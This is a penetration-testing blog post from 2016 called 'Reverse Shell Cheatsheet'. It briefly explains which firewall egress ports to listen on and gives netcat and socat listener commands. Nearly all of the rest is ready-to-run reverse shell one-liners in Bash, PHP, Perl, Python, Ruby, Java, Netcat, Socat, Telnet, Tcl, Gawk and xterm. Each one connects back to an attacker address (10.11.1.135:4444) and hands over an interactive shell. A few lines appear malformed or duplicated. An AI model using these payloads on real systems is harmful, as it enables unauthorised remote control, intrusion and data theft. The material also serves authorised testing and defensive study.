Reverse Shell Cheatsheet

Home / Reverse Shell Cheatsheet

Reverse Shell Cheatsheet

December 27, 2016 | Article | 1 Comment

During penetration testing, we might be lucky enough to exploit a command execution vulnerability. Soon, we want and interactive shell to penetrate deeper. Some approach involving “login” mechanism, such as add new account / SSH key / .rhosts file. However if these approach is not viable then hop would be shell, either reverse shell or binding shell to a TCP port. As stated in title, we will discussing the former.

Below we curate reverse shells that use various programming language or tools on target machine.

Listening Home

Most network firewall egress filters allow

  • http (tcp port 80)
  • https (tcp port 443)
  • dns (tcp/udp port 53)
  • smtp (tcp port 25)
  • ping (icmp requests and echo replies)

While it’s not always be true, it can be our initial attempt to set listening socket to one of those ports. Remember that reverse shell need a “home” or something in our machine that listen and communicate with reverse shell.

The simplest trick in our disposal is using netcat to listen on socket. Most likely netcat is installed by default.

nc -vlp 4444

Or if we are using socat, we can use this.

socat READLINE,history:/tmp/history.cmds TCP4-LISTEN:4444

or we can create a redirectory on public faced machine which will give the traffic to our system.

Reverse Shell

Bash

exec 5<>/dev/tcp/10.11.1.135/4444
cat <&5 | while read line; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/10.11.1.135/4444 0>&1
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/10.11.1.135/4444; sh <&196 >&196 2>&196

TCLsh

#!/usr/bin/tclsh
set s [socket <IP> <PORT>];
while {42} {
  puts -nonewline $s "shell>";
  flush $s;
  gets $s c;
  set e "exec $c";
  if {![catch {set r [eval $e]} err]} {
    puts $s $r;
  }
  flush $s;
}
close $s;
echo 'set s [socket <IP> <PORT>];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

PHP

php -r '$sock=fsockopen("10.11.1.135",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.11.1.135",4444);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.11.1.135",4444);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("10.11.1.135",4444);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.11.1.135",4444);popen("/bin/sh -i <&3 >&3 2>&3");'

Netcat

nc -e /bin/sh 10.11.1.135 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.1.135 4444 >/tmp/f
/bin/sh | nc 10.11.1.135 4444

Socat

socat TCP:10.11.1.135:4444 EXEC:/bin/bash
socat OPENSSL:10.11.1.135:4444 EXEC:/bin/bash,pty

Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet 10.11.1.135 0/tmp/p
telnet 10.11.1.135 80 | /bin/bash | telnet 10.11.1.135 0 443

Perl

perl -e 'use Socket;$i="10.11.1.135";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -e 'use Socket;$i="10.11.1.135";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

for Windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.11.1.135:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.11.1.135",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.11.1.135","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e "c=TCPSocket.new("10.11.1.135","4444");while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end"

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.11.1.135/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.1.135",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Gawk

#!/usr/bin/awk -f
BEGIN {
   s = "/inet/tcp/0/10.11.1.135/4444"
   while(42) {
      do{
         printf "shell>" |& s
         s |& getline c
         if(c){
            while ((c |& getline) > 0)
               print $0 |& s
            close(c)
         }
      } while(c != "exit")
      close(s)
   }
}
awk 'BEGIN {s = "/inet/tcp/0/10.11.1.135/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

xterm

one of the simplest reverse shell.

xterm -display 10.11.1.135:1

to catch incoming forms of reverse shell in xterm session

Xnest :1

 

,

About Author

about author

xathrya

A man who is obsessed to low level technology.

1 Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Social media & sharing icons powered by UltimatelySocial